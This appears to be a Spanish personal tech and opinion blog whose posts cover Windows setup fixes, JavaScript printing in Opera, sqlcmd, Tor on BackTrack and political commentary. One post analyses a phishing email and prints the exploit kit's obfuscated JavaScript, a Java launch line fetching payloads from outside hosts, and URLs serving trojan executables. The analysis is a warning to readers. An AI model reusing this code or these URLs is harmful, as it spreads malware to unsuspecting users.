Ahora mismo ya estoy instalando un Windows 7 Professional 64bits desde un USB, en mi nuevo ordenador, pero os reconozco que he tardado 1 hora y pico en conseguirlo. ¿Por qué si el proceso parece tan fácil?

Tras buscar cómo instalar Windows 7 desde un USB, bajarme la aplicación Windows 7 USB/DVD download tool, probarla 6 veces y obtener el mismo mensaje de error (en el que decía que no había podido preparar el USB para que sea arrancable), probar con diskpart (y tener problemas con que list disk no mostraba mis discos usb) me decidí a usar la cabeza.

En el mensaje de error hablaba de que en el proceso de preparación del disco USB había intervenido la aplicación bootsect. Sabiendo que viene incluido en el DVD de instalación, subcarpeta 'boot', probé a ejecutarla:

La aplicación bootsect.exe no es una utilidad Win32 válida

¿Qué? Pero si estoy preparando el USB en un portatil con Windows XP 32bits, ¿por qué me dice eso? Tras un ratito de reflexión (no os lo negaré) me di cuenta que estaba queriendo preparar la instalación de un Windows 7 Professional 64bits y que estaba usando su aplicación bootsect (también en 64bits) desde un entorno de 32bits. Clarísimo, a que sí?! Así que me puse a buscar la versión 32bits de bootsect.exe, encontré en Seven Forums, la copié en la carpeta donde instalé Windows 7 USB/DVD, que en mi caso era:

C:\Documents and Settings\nombre_de_usuario\Configuración local\Datos de programa\Apps\Windows 7 USB DVD Download Tool

y tras ejecutarla de nuevo conseguí preparar correctamente el USB.

¿Sencillo, no? Espero que os valga y que hayáis tardado menos que yo en encontrar la respuesta. Os dejo que tengo que seguir instalando el equipo :-)

window.print();

no funciona siempre en Opera. Para que en lo haga hay que tener en cuenta que la página debe estar completamente cargada. Si esto se cumple, el siguiente ejemplo funciona:

<input type="button" value="Print this page" onClick="javascript:window.print();" ID="Button1" NAME="Button1">

El problema viene cuando antes de imprimir necesitamos hacer algo sobre el HTML ( abrimos una nueva ventana, modificarlo, etc). Tomemos este ejemplo, en el que en la función ocultar() debe hacer cosas previas a la impresión.

function imprimePagina(){
    ocultar(); // funcion que necesita ocultar información que no debe ser impresa.
    window.print();
    // resto de código;
}

Este ejemplo funciona en IE, Firefox, Chrome pero no en Opera. Para solventarlo podríamos probar con:

function imprimePagina() {
    ocultar(); // funcion que necesita ocultar información que no debe ser impresa.
    window.setTimeout(function () {
        window.print();
    }, 5);
    // resto de código;
}

Que, si no he escrito mal el ejemplo, debiera funcionar. En el caso de que abriéramos una ventana hemos de recordar lo que comentamos al principio: la página, la nueva, debe estar completamente cargada antes de intentar imprimirla en Opera. Como no controlamos en qué momento sucede esto, podemos confiar en el evento load de la ventana para imprimirla.

window.onload = function () {
    window.setTimeout(function () {
        window.print();
    }, 500);
}

Espero que a alguno le valga de algo :-)

Referencia: http://stackoverflow.com/questions/3482428/window-print-not-working-with-opera-browser

Texto del email:

Payment Notification #04743410 
The ACH transaction (ID:04743410 ), recently initiated from your checking account (by you or any other person), was canceled by the other financial institution.
Rejected transaction 
Transaction ID: 04743410 
Reason for rejection: See details http://nacha.org/report/04743410/detailis.php?n=8389 
________________________________________
8307 Sunrise Valley Drive, Suite 100 Herndon, VA 20171 (703)561-1100 2011 NACHA - The Electronic Payment Association 

Para empezar, al pinchar en el enlace que vemos no nos lleva a la dirección indicada, sino a http://madhusundergroup.com/06elcu/index.html, cuyo código HTML es el siguiente:

<html>
<script language="JavaScript" type="text/JavaScript" src="http://www.xmjhx.com/czc/js.js"></script>
<script language="JavaScript" type="text/JavaScript" src="http://www.laserdentmexico.com/images/js.js"></script>
<script language="JavaScript" type="text/JavaScript" src="http://actionmovingjoplin.com/sound/js.js"></script>
</html>

El primer fichero, js.js, nos redirige a un nuevo documento PHP:

document.location='http://losecraft.com/main.php?page=baa0dc5f2ec2ccc7';

Cuyo contenido es más o menos el siguiente (lo tenéis completo en el adjunto):

<html>
<body>
<applet height=1 code='json.Parser.class' width=1 archive='./content/field.jar'><param  val=123 name=p value='e00oMDD=Rfhq%Qu0VqRmDBVoeoju8gi6h83'/></applet>
<font style="display:none;">73^84^72^48^15............</font><script>

function setCharAt(str,q,index) {
	i=index;
	c=String.fromCharCode(1*str[i] + 27);
	return c;
}
md="a";
v325v3=function(){
	try{if(+new Object(123)===123)throw 1;}catch(q){
	return document["getElementsByTagName"]("font")[0].innerHTML["split"]("^");
	}
}
			c=new String();
			i=0;
			s=v325v3.call();
			while(i!=s.length){
				c+=setCharAt(s,123,i);
				i++;
			}
			try{document.tb5tb34t.t4bh34}catch(q){
			eval(c);
			}
		</script></body></html>

Este documento trata de descargar un fichero Java (field.jar) y evaluando, con javascript, la cadena de números que hay dentro de las etiquetas <font style="display:none;"> (ver negrita) construye un IFRAME donde se pone a trabajar (ver fichero 'codigo_del_iframe.txt' adjunto). No entiendo bien el proceso al completo pero creo que veo por donde va:

1. comprueba qué versión tiene el cliente de Java, Adobe Acrobat y Flash (inicializa estas variables que luego llena):
   

   var jver=[0,0,0,0],pdfver=[0,0,0,0],flashver=[0,0,0,0];

2. comprueba qué navegador está usando el cliente:
   

   initScript:function(){var c=this,a=navigator,e="/",i=a.userAgent||"",g=a.vendor||"",b=a.platform||"",h=a.product||"";
   c.OS=100;if(b){var f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,
   "Win.*Mobile",22.2,"Pocket\s*PC",22.3,"",100]
   

3. averigua cómo lanzar su exploit (con la información anterior)
   

   if(c.isIE){var f,j=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM",
   "ShockwaveFlash.ShockwaveFlash","TDCCtl.TDCCtl","Shell.UIHelper","Scripting.Dictionary",
   "wmplayer.ocx"];for(f=0;f<j.length;f++){if(c.getAXO(j[f])){c.ActiveXEnabled=true;break}}
   c.head=c.isDefined(document.getElementsByTagName)?document.getElementsByTagName("head")[0]:null}
   c.isGecko=(/Gecko/i).test(h)&&(/Gecko\s*\/\s*\d/i).test(i);
   c.verGecko=c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i)?RegExp.$1:"0.9"):null;
   c.isSafari=(/Safari\s*\/\s*\d/i).test(i)&&(/Apple/i).test(g);
   c.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);c.verChrome=c.isChrome?c.formatNum(RegExp.$1):null;
   c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
   c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(i)||1)?parseFloat(RegExp.$1,10):null;
   

4. Y decide como colar su regalito: usando Java, Flash o Adobe Acrobat

Si, tras evaluar el navegador del cliente y los plugins instalados, decide usar Java comprueba su versión y ruta:

try{pf='\\Program Files\\Java\\jre6\\lib\\ext';
pf2=pf.replace('es','es (x86)');
jtrnew('file:C:'+pf);jtrnew('file:C:'+pf2);
jtrnew('file:D:'+pf);jtrnew('file:D:'+pf2);
jtrnew('file:E:'+pf);jtrnew('file:E:'+pf2);}catch(e){}}spl2()}

e intenta lanzar su exploit (creo que intenta descargar lo mismo de dos direcciones alternativas, a día de hoy, sólo funciona la segunda)

try{var bs=document.createElement("OBJECT");bs.setAttribute("type",smbp);bs.setAttribute("width",0);
bs.setAttribute("height",0);document.body.appendChild(bs);
bs.launch("http: -J"+"-jar -J\\\\91.229.90.32\\pub\\new.avi  http://losecraft.com/w.php?f=20&e=2 none")

Si, por el contrario, decide lanzar el exploit en formato PDF manda uno en función de qué versión se encuentre de Adobre Acrobat:

• Si versión < 9 => ejecuta http://losecraft.com/content/1ddfp.php?f=20 [ descarga el fichero 'si_pdf_entre_0_y_8-0dfdd.pdf']
• si versión = 9 => ejecuta http://losecraft.com/content/2ddfp.php?f=20 [ descarga el fichero 'si_pdf_version_9-7c2a2.pdf']

Estos documentos PDF contienen código javascript, que reconozco no he analizado pero que deben ser divertidos.

Si prefiere usar Flash, se descargará el fichero score.swf con el que, pasandole un exploit intentará, ganar una shell y descargar el fichero deseado: wpbt0.dll [1]

{var fname="content/field";
var Flash_obj="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>";
Flash_obj+="<param name='movie' value='"+fname+".swf' />";al="always";
Flash_obj+="<param name='allowScriptAccess' value='"+al+"' />";Flash_obj+="<param name='Play' value='0' />";
Flash_obj+="<embed src='"+fname+".swf' id='swf_id' name='swf_id'";Flash_obj+="allowScriptAccess='always'";
Flash_obj+="type='application/x-shockwave-flash'";Flash_obj+="width='10' height='10'>";Flash_obj+="</embed>";
Flash_obj+="</object>";var oSpan=document.createElement("span");document.body.appendChild(oSpan);oSpan.innerHTML=Flash_obj;} 

Y de paso vuelve a iniciar el proceso con otra página.

{var name=navigator.plugins[i].name;if(name.indexOf('Media Player')!=-1)
{m=document.createElement('IFRAME');m.setAttribute('src','./content/cph2.php?c=20');
m.setAttribute('width',0);m.setAttribute('height',0);document.body['appendChild'](m)}}}
catch(e){} setTimeout(spl7,1000)}function getCN(){return 'content/score.swf'} 

Todo este proceso, de lo más trabajado, es para descargar, en el ordenador del cliente, el troyano wpbt0.dll [1]

Os dejo una captura del Process Explorer examinando el fichero.

Comentario para los jugones: si váis cambiando el valor del parámetro 'e' en las peticiones a w.php os descarga distintos ejecutables (algunos con nombres bien conocidos cuyo destino desconozco pero qee, seguro, no nos va a gustar mucho).

• http://losecraft.com/w.php?f=20 descarga about.exe
• http://losecraft.com/w.php?f=20&e=1 -> contacts.exe
• http://losecraft.com/w.php?f=20&e=2 -> calc.exe
• http://losecraft.com/w.php?f=20&e=3 -> readme.exe

Así que cuidado con qué páginas visitáis ;-)

Herramienta de l¡nea de comandos de Microsoft (R) SQL Server
Versi¢n 9.00.5000.00 NT INTEL X86
Copyright (c) Microsoft Corporation. Reservados todos los derechos.

Uso: Sqlcmd            [-U Id. de inicio de sesi¢n]          [-P contrasña]
  [-S servidor]            [-H nombre de host]          [-E conexión de confianza]
  [-d usar nombre de base de datos] [-l tiempo de espera de inicio de sesión]     [-t tiempo de espera de consulta]
  [-h encabezados]           [-s separador de columna]      [-w ancho de pantalla]
  [-a tama¤o de paquete]        [-e entrada de eco]        [-I habilitar identificadores entre comillas]
  [-c fin de comando]            [-L[c] listar servidores[salida limpia]]
  [-q "consulta de línea de comandos"]   [-Q "consulta de línea de comandos" y salir]
  [-m nivel de error]        [-V nivel de gravedad]     [-W quitar espacios finales]
  [-u salida Unicode]    [-r[0|1] mensajes a stderr]
  [-i archivo de entrada]         [-o archivo de salida]        [-z nueva contraseña]
  [-f <p ginaDeC¢digos> | i:<p ginaDeC¢digos>[,o:<p ginaDeC¢digos>]] [-Z nueva contrase¤a y salir]
  [-k[1|2] quitar[reemplazar] caracteres de control]
  [-y ancho de pantalla de longitud variable]
  [-Y ancho de pantalla de longitud fija]
  [-p[1] imprimir estad¡sticas[formato dos puntos]]
  [-R usar configuraci¢n regional de cliente]
  [-b anular por lotes si hay errores]
  [-v var = "valor"...]  [-A conexi¢n de administrador dedicada]
  [-X[1] deshabilitar comandos, secuencia de comandos de inicio, variables de entorno [y salir]]
  [-? mostrar resumen de sintaxis]

Conexión con autenticación de Windows a la "instancia" del servidor "host"

sqlcmd -S host\instancia 

Conexión con autenticación de Windows a la base de datos "BaseDeDatos" de la "instancia" del servidor "host"

sqlcmd -S host\instancia -d BaseDeDatos

Conexión con autenticación de SQLServer a la "instancia" del servidor "host" usando las credenciales usuario + clave

sqlcmd -U usuario -P clave -S host\instancia

Una vez conectados lo único que debemos recordar es que para ejecutar sentencias T-SQL que escribamos hemos de usar la sentencia GO. Veamos una ejemplo sencillo.

-- Conexión: 
sqlcmd -S host\sqlexpress
-- Establecemos la base de datos:
use database;
go
-- Ejecutamos una consulta:
select * from tabla;
go
nombre         apellido1         apellido2
---------------------------------------------------------------------
Antonio         Martinez         Luzco
Mirella         Abad             Nothing

(2 filas afectadas) 

Nos conectamos de nuevo y configuramos la conexión de modo que nos quite los espacios al final (opción -W), fijando el separador de columas ( -s "|") y nos conecte a la base de datos "BaseDeDatos":

sqlcmd -S hos\instancia -d BaseDeDatos -s "|" -W
-- Ejecutamos una consulta:
select * from tabla;
go
nombre|apellido1|apellido2
---------------------------------------------------------------------
Antonio|Martinez|Luzco
Mirella|Abad|Nothing

(2 filas afectadas)

Como veis es una herramienta sencilla pero pontente. Aquí os dejo más referencias sobre sqlcmd, Ciao

• sqlcmd Utility - http://msdn.microsoft.com/en-us/library/ms162773.aspx
• Lección 1: Iniciar sqlcmd - http://msdn.microsoft.com/es-es/library/ms166559.aspx
• SQLCMD Step-by-Step - http://databases.about.com/od/sqlserver/ss/sqlcmd.htm
• Using SQL Server 2005 sqlcmd Utility - http://www.databasejournal.com/features/mssql/article.php/3566401/Using-SQL-Server-2005-sqlcmd-Utility.htm

apt-get udpate && apt-get upgrade

y

sudo ./pentest/exploit/framework3/msfudpate

y ya está! A que domino el mundo de Linux :-) Siguiendo en mi línea de 'explosiones de actividad' cuando salió la versión 5 de Backtrack me dije: "ahora sí, de esta no pasa". Lo cierto es que de momento la fiebre linuxera me está durando algo más que la vez anterior y he cambiado la versión 4 por la 5. Vale, ¿ya ahora qué? En este punto es donde siempre me quedaba. Como lo que más utilizo en mi pruebas con Windows es Tor me dije, ¿por qué no lo instalo y así puedo enredar con tranquilidad en los juguetes que trae la distribución? Pués de eso va este mini howto: Instalar Tor en Backtrack 5 en 2 sencillos pasos.

1. Instalamos Tor como dice [1] pero no instalamos Privoxy porque:

apt-get install tor tor-geoipdb

ya nos instala Polipo [2] (un servidor proxy que hace las funciones de Privoxy) que configuramos como dice [3] para decirle que utilice Tor. Editamos su fichero de configuración y añadimos:

socksParentProxy = "localhost:9050"
socksProxyType = socks4

Para ejecutar aplicaciones a través de un determinado proxy tenemos ya instalada, entre otras, proxychains (hay más pero fue la primera que encontré) que rápidamente podemos configurar para que use Tor. Editamos /etc/proxychains.conf y vemos que la instalación de Tor ya modificó el fichero por nosotros (qué majo!).

2. Instalamos lynx para probar el funcionamiento de Tor accediendo a WhatIsMyIp (paso opcional), probamos a visitar www.whatismyip.com con lynx conectando a través de nuestra instalación de Tor:

	proxychains lynx http://www.whatismyip.com

Pues ya está!! Aquí os van un par de capturas.

Lynx negociando la conexión con Tor.

Lynx accediendo a Whatismyip.com a través de Tor

Por lo sencillo que ha resultado diréis que me podía haber ahorrado el post pero si las otras veces que instalé Backtrack hubiera encontrado un sencillo artículo como este ahora sería el Arguiñano del Backtrack :-)

[1] http://www.binbert.com/blog/2011/06/how-to-install-tor-on-backtrack-5/
[2] http://www.pps.jussieu.fr/~jch/software/polipo/
[3] http://www.pps.jussieu.fr/~jch/software/polipo/tor.html

Dicen que vemos la paja en el ojo ajeno pero no la viga en el propio. No, creo que lo que quiero decir es: no desees para los demás lo que no quieres para tí mismo.

No es raro el día en que el informático, y hablo de este gremio porque es en el que me muevo, en que no reciba el comentario del avispado usuario diciendo que este debiera saberlo  todo del tema simplemente por trabajar con un ordenador.

Oye, mira! Que me han regalado esta tableta y no tengo ni idea de usarla. ¿Me la configuras? Ah! ¿Sabrías decirme porque el Word no me deja incluir esta imagen de mi niña como fondo del objeto que he insertado dentro de una tabla? Otra cosa: he perdido un correo que estaba escribiendo, ¿puedo recuperarlo? Por cierto, ¿no sabrás si el programa ese de la 'e' azul es un virus? Es que me cuando navego me salen ventanas sin parar y no puedo hacer nada más.

A esta gente le diría que: 

• Al electricista que va a su casa a hacerle las ñapas, que  'sabe de cables', pruebe a preguntarle  si existe una separacíón mínima entre las torres de alta tensión del tendido eléctrico. O por qué el rendimiento de las centrales hidroeléctricas es menor que el de una central nuclear (todas ellas no llevan cables, ¿no?).
• Al próximo fontanero que entre por su casa, ya que 'sabe de soldar', le pregunte que qué opina del sistema de construcción de superbuques que tienen en Corea (construcción del barco en secciones y soldura con laser) o, como usa gafas de protección, qué si le sabría aconsejar en la compra de unas gafas de sol (es que las que tiene ya son muy viejas).
• A su primo 'que trabaja con números' le podría preguntar que qué opina de las entidades de valoración de riesgo de deuda, o si ve claro el final de la crisis mundial (como es de origen económico) o, mejor aún, si este año Hacienda le devolverá dinero.

Seguro que, como dice un compañero, alguno le iba a mandar 'de viaje y sexo' :-) Todo esto viene a que hoy ha vuelto a pasar: una persona plenamente capacitada para el desarrollo de su actividad laboral (en la que hay que usar la cabeza) no la ha usado mucho para soltar una perla de estas:

 [...] como trabajas en informática debes saber todo sobre el tema, y punto!!

Precio de Iomega iConnect Wireless Data Station en MediaMarkt (al que hay que quitarle el 18%):

 Precio de Iomega iConnect Wireless Data Station en Worten (al que hay que ponerle el IVA):

Como dicen ellos: "Yo no soy tonto" .... ¿y tú? Por cierto, ¿Imagináis cuál de las dos tiendas estaba llena? :-)

1. Españistan: http://estepaissevaalamierda.wordpress.com
2. Video de Españistán en Youtube: http://www.youtube.com/v/N7P2ExRF3GQ

El otro día surgió en el trabajo un conversación sobre el uso del lenguaje no sexista en los documentos de la Administración. Como en otros muchos casos la conversación no provocó que nadie cambiara de opinión, no fue más que un simple intercambio de opiniones, pero algunas de las cosas que se comentaron no dejaron de sorprenderme. En un momento dado se habló sobre los proyectos que surgen bajo este, y otros tipos, de leyes, propuestas o movimientos. Uno de ellos fué la creación de aplicaciones de corrección del lenguaje sexista. Vaya ideón!!! Os imagináis a vuestro amigo el clip de office revisando vuestros documentos y diciendo lo sexistas que sois :-)

Partiendo del hecho de que trabajo en esto del desarrollo del software y entiendo los problemas del nivel de perfección de la ejecución de la aplicación (vamos, que la aplicación puede fallar más que una barraca de ferias en las primeras versiones del desarrollo) os dejo un ejemplo de una aplicación correctora del lenguaje sexista [1], ya utilizada en alguna que otra comunidad [2], que bien bien, lo que se dice bien, no funciona.

Veamos un ejemplo: si le pedimos que analice un texto sencillo como:

Los amigos de Elena son un millar.

No encuentra ningún problema. Vale, todo correcto. ¿Pero qué nos dirá si añadimos algo de color al texto?

Los amigos de Elena son un millar. Quizás las mujeres debieran dedicarse a limpiar la cocina en lugar de entrometerse en temas educativos ya que los hombres son científicamente superiores a las mujeres

Pués nada de nada!! Que somos unos usuarios perfectamente concienciados con la igualdad efectiva de mujeres y hombres y que consideramos perfectamente a la mujer como ..... floreros???!?!? :-/

Ante el pequeño error de la aplicación me surgen varias preguntas: ¿qué es mejor? ¿Enseñar a la persona a escribir correctamente (eliminando la necesidad de este tipo de programas) o dejar que el usuario escriba (y quizás piense) burradas y que sea el programa superlisto el que las corrija? Y la más profunda: ¿realmente es necesario este tipo de programas? Creo que mucho de esto se solventaría con un correcto uso del idioma, capacidad deseable para todas las personas y una necesidad para aquellos que redacten textos.

Con seguridad el mensaje de fondo de estas letras no se entenderán y se interpretará al revés, recordad cómo he empezado el texto, pero siento que debo decir lo que pienso al respecto. Porque en este tema, como en otros, siento que se está creando un problema donde antes nadie lo veía. Un ejemplo: en la conversación del otro día le pregunté a una compañera, que fue a un curso sobre 'el lenguaje no sexista en la Administración', si antes de ir al curso se sentía ofendida (o molesta) cuando leía los mismos documentos que después del curso sí lo hacían La respuesta fue sencilla: no. ¿El problema, para ella, existía antes del curso o después? ¿Es un problema real o sugerido? Por cierto, ¿Qué es eso del genérico masculino? [3] ¿Para dar visibilidad a la mujer hemos de modificar la definición actual del lenguaje? ¿Esta modificación estará siendo bien pensada o interesa más hacerlo rápido antes que bien? No sé si esto último es cierto o no pero decir 'compañeros y compañeras' en lugar del genérico 'compañeros' es, para mí, un atraso (me induce cero de visibilidad para la mujer y provoca mi desconexión del hablante).

P.D: escribiendo el texto anterior me acordé de una pregunta que rondaba por mi cabeza cuando leía la ley de Igualdad [4], ¿Por qué, en el texto de la misma, siempre que se referenciaba al par hombre/mujer lo hacen del mismo modo mujer/hombre? ¿Es esto algo de discriminación positiva? Que alguien me lo explique que estaré gustoso de aprender.

1. Themis: http://www.themis.es/Noticias.html
2. Cantabria contará con un corrector de expresiones sexistas en sus documentos:
   http://www.20minutos.es/noticia/667764/l/
   http://www.amecopress.net/spip.php?article3600
3. http://www.google.es/search?q=gen%C3%A9rico+masculino
4. Ley Orgánica 3/2007, de 22 de marzo, para la igualdad efectiva de mujeres y hombres

1. envidia por el sueldazo que este tío se lleva y va a llevar al bolsillo por la patilla
2. enfado y decepción al ver cómo el Gobierno se ha dejado engañar, de nuevo, por una colección de listos que se imaginaron un modo de robar a todo Dios (arriba el canon digital!!) y que sigue auspiciando cualquier nuevo ideón de estas mentes privilegiadas.

Ahí os dejo esto, ciao!

Diréis que sólo escribo para hablar de mi hermano, cierto es, pero qué hay mejor que apoyar a la familia :-) A lo que vamos, me acaba de llegar la noticia de que Tomás Hoya ha ganado, en la categoría de acuarela, el XX Premio de pintura Manuel Liaño Beristain, con su obra 'Nubes de rivera', y creo que debo compartirlo con todos. Enhorabuena artista!!!

Fuente: Fallo del XX concurso de pintura Manuel Liaño

Me alegra comentaros que de nuevo Tomás Hoya expone en Santander. En esta ocasión, en el Aula del Vino, en la calle Méndez Núñez, una transversal entre la calle Lealtad e Isabel II, detrás del bar Machichaco en Calderón de la Barca (abajo os incluyo un mapa). El recinto donde trendrá lugar la exposición, el Aula del Vino, se dedica al negocio del vino, tanto a la venta, como a talleres de cata y divulgación (además de ofrecer el atractivo de exposiciones temporales).

Será una selección de obras en pequeño formato. Algunas las conoceréis por la web, pero hay otras inéditas, que espero te sorprendan.

Ver mapa más grande

Hoy, buscando con programas de monitorización de un SQLServer, me he encontrado, entre toda la oferta de programas de pago, con SQL Live Monitor [1], un monitor de SQLServer ligero y gratuito. Según los autores:

una aplicación en .NET que proporciona información del estado "en tiempo real" de la instación de SQL Server destino. No necesita instalación, muestra de información en tiempo real, y posibilidad de exportarla a ficheros para su posterior análisis. Además, también captura información SQL para su tratamiento usando PAL [2] (Performance Analysis of Logs)

De no tener nada a tener esta ayuda, va un trecho :-)

• SQL Live Monitor
• Performance Analysis of Logs

Tras buscar un poco [2] y [3] encontré que para hacer lo mismo hacen los chicos de unix con el comando "ln" [1] en Windows, con discos formateados con NTFS, tenemos dos opciones:

• mklink
• junction de Sysinternals Suite

La verdad es que la sintaxis de ámbos es tan sencilla que con que la leáis la entenderéis :-) Para el comando mklink:

MKLINK [[/D] | [/H] | [/J]] Link Target

        /D      Creates a directory symbolic link.  Default is a file
                symbolic link.
        /H      Creates a hard link instead of a symbolic link.
        /J      Creates a Directory Junction.
        Link    specifies the new symbolic link name.
        Target  specifies the path (relative or absolute) that the new link
                refers to.

En el caso de junction:

usage: junction [-s] [-q] 
       -q     Don't print error messages (quiet)

       -s     Recurse subdirectories

usage: junction [-d]  []
       -d     Delete the specified junction
       example: junction d:\link c:\winnt

Tan pronto como decida si los enlaces simbólicos son la solución que buscaba os lo cuento. Ciao.

Ah! aquí os dejo los enlaces.

1. Comando 'ln' en Unix
2. Windows equivalent command to unix “ln”
3. How do I create a symbolic link in Windows?
   
4. NTFS symbolic link
   

PD. Otra cosa que me encontré, en la búsqueda, fue la Guía de Referencia de comandos de Windows (a partir de Windows Vista) que creo es un buen documento a tener.

A raiz del email de un compañero sobre la acción de los Anonymous sobre la firma de seguridad HBGary Federal [1] he visto un ejemplo más de cómo corre la información en Internet.

Como podéis leer en el artículo que me llegó [1] hablan del CMS pero no especifican cuál era. Picado por la más sana de las curiosidades me pregunto por cuál es ese CMS en cuestión que, según muchos de los comentarios dejados en diversas páginas, es tan malo. Lo primero que hago (en realidad no hice eso, porque uno es un poco freak para algunas cosas) busco en internet 'which cms HBGary' [2] y me encuentro con que mi pregunta es una estupidez y que muchos ya la han resuelto. El CMS en cuestión se llama CMSes (ver [3], [4], [5] y [6])

Uno que es un cabezota se niega a aceptar que es medio estúpido y decide confirmar que ese es el CMS. Miro en Open Source CMS [7] y no encuentro nada [8] ¿será un CMS de pago o alguien ha metido la pata traduciendo la noticia en inglés? Decidid vosotros pero hasta que encuentre el nombre del dichoso CMS apuesto por lo segundo ;-)

Ah, se me olvidaba. ¿Habéis visto cómo, y con qué calidad, corre la información por Internet? Miedo que me da!!! :-)


[1] http://arstechnica.com/tech-policy/news/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack.ars/
[2] http://www.google.es/search?q=which+cms+HBGary
[3] http://redorbita.wordpress.com/2011/02/23/el-ataque-de-anonymous-a-hbgary/
[4] http://kr0no.diosdelared.com/?coment=9507
[5] http://www.blackploit.com/2011/02/el-ataque-de-anonymous-hbgary.html
[6] http://www.meneame.net/story/como-anonymous-hackeo-hbgary-eng
[7] http://php.opensourcecms.com/
[8] http://php.opensourcecms.com/scripts/search.php?siteSearchTerm=CMSes

Imagino que es muy difícil para una nación sacarse de encima una huella, como la que dejó en España, durante 300 años, una institución como La Inquisición. A través de los edictos de gracia, y más tarde los edictos de fe, se alentaba ardientemente entre la población, las prácticas alienantes de la autoinculpación y de la delación de posibles cómplices en la heregía. Las acusaciones eran anónimas, con lo que proliferaban las denuncias falsa, tan sólo para perjudicar a un vecino o competidor, y así beneficiarse con su desgracia.
En los interrogatorios, la tortura más salvaje era utilizada indiscriminadamente entre hombres y mujeres de toda edad, y los que confesaban, quien no, eran condenados a diferentes penas, la más grave, morir en la hoguera en acto público, ocasión que se aprovechaba para montarse una fiesta.

Como es natural, esto tuvo que producir un estado de miedo generalizado a ser acusado. Y en caso de serlo, el denunciado, buscando la indulgencia, denunciaría a su vez, alimentando un estado de paranoia colectiva sin fin. Las últimas actuaciones del tribunal, datan de finales del siglo XVIII, y principios del XIX, y 300 años son muchos años para nuestras delicadas conciencias colectivas.
Pensándolo un poco, no creo que sea difícil rastrear su legado hasta hoy, retorcido por el paso del tiempo, y encontrarlo en las actitudes de ciertos periodistas y gentes que viven de la opinión en periódicos, tertulias televisivas y radiofónicas.

Pero lo más triste es que tampoco nuestros políticos pueden escapar al influjo de la historia. Porque ellos, aunque no lo parezca, como son españoles también, han estado sujetos a la misma educación que todos nosotros, y están empapados por  los mismos usos y costumbres, y como en España, abunda entre ellos la mediocridad, más visible en la clase política por estar contínuamente bajo los focos. Pero sobre todo, quien más ha prácticado estas formas tan nocivas, es la derecha, tanto política como mediática, con la insufrible legislatura 2004-2008 como paradigma.

Ahora que se acercan las elecciones de mayo, podremos disfrutar de nuevo, del cruce de acusaciones de corrupción y demás tópicos de guión. Y como los casos estrella de la misma, eclipsan a los pequeños y cotidianos, hay ciudadanos que se han molestado en recopilar una muy importante cantidad de los que salpican nuestro territorio. Seguramente, más de uno se llevará una sorpresa al comprobar, que no sólo el PP tiene corrupción, y que como dicen por ahí, el dinero no  entiende  de ideologías ni de patrias.

Simple y eficaz.

En medio de esta tormenta llamada CRISIS, los causantes de la misma, al más puro estilo de los ilusionistas, agitan las emociones y los miedos con una mano, mientras con la otra se llevan hábilmente los derechos y el dinero de sus entregadas víctimas. Víctimas que parecen no haber despertado del sueño que terminó hace dos años.

Estoy convencido que una parte de nuestro imaginario colectivo todavía cree que es posible regresar a ese paraíso perdido. Que todos estos pequeños reveses que estamos sufriendo son fruto de un bache pasajero. Que son necesarios para volver a dormirnos y así disfrutar de nuevo de la generosidad de nuestros bancos, de la cara amable de nuestro gobierno, y de unos medios de comunicación que no nos atormenten más con desastres futuros.

Pero como es posible que eso no vaya a ocurrir, hay personas y colectivos que se dedican a la desagradable tarea de pensar por sí mismos, y algunos llegan a conclusiones tan extravagantes, como creer que no sólo el ciudadano de a pie debe ser el único que pague los platos rotos de la pasada fiesta. Para ello se vuelve a hablar  de resucitar la tasa Tobin. ¿Tasa Tobin? Pues sí, la tasa Tobin, que dicho brevemente, sugiere grabar las transacciones financieras internacionales con un porcentaje de entre el 0,025 y el 0,1%, y con la recaudación combatir la pobreza tanto en el norte como el sur.
¿Y por qué las transacciones financieras? Porque el 80% de ellas son de carácter especulativo, y en gran medida son responsables de la situación actual. Hasta ese artefacto manipulado y manipulador que es el FMI (Fondo Monetario Internacional), reconoce su peligrosidad. Y por otra parte, la implantación de dicha tasa tiene su lado poético, al grabar a los ricos para socorrer a los pobres. ¿Qué más se puede pedir?

Esperemos que los esfuerzos de Intermón Oxfam y otras organizaciones por concienciar a los políticos europeos de la conveniencia de su implantación, den sus frutos.

Si queréis hacer algo más que leer, aquí os dejo un enlace para que aportéis vuestro granito de arena.

Os comunico que, de nuevo, el artista Tomás Hoya expone en Santander. Este vez será en Miranda Delicatessen un pequeño local de comida con un toque diferente (ver mapa para saber cómo llegar). No dudéis en visitar la Web del artista para más información.

Ver mapa más grande

.... pero es que también está la versión de los expertos que no salen en los grandes medios..

que nos lleva a la web de Juan López Torres , me he encontrado con la invitación de para unirnos a un llamamiento: Mesas de convergencia, para una salida social a la crisis. Creo que merece, por lo menos, dos cosas: que le demos publicidad (copiándolo en este web, esperamos que con su permiso) y que pensemos en ello.

Estimado amiga y estimada amigo;
Un grupo de personas preocupadas por la situación política y por las amenazas que se ciernen sobre sectores cada vez más amplios de la población sentimos la necesidad de tomar la iniciativa. Pensamos que ha llegado el momento de impulsar un proceso de acercamiento y convergencia de todos los sectores y sensibilidades de la izquierda para ir conformando una respuesta unitaria y eficaz a la situación que vive nuestro país de países.
Nuestra pretensión es muy abierta pero muy clara. Estamos convencidos de que es imprescindible promover la más amplia confluencia de fuerzas de la izquierda social y política frente a la ofensiva neoliberal que estamos sufriendo. Esta ofensiva probablemente no va a remitir en los próximos tiempos sino todo lo contrario.
Creemos que es necesario ir construyendo consensos para definir valores y políticas que permitan defender el bienestar colectivo, la justicia social, el desarrollo sostenible y las libertades democráticas en estos momentos críticos que estamos viviendo. Es sólo un comienzo pero un comienzo necesario para empezar a articular una contraofensiva al neoliberalismo dentro del actual panorama de la izquierda en nuestro país.
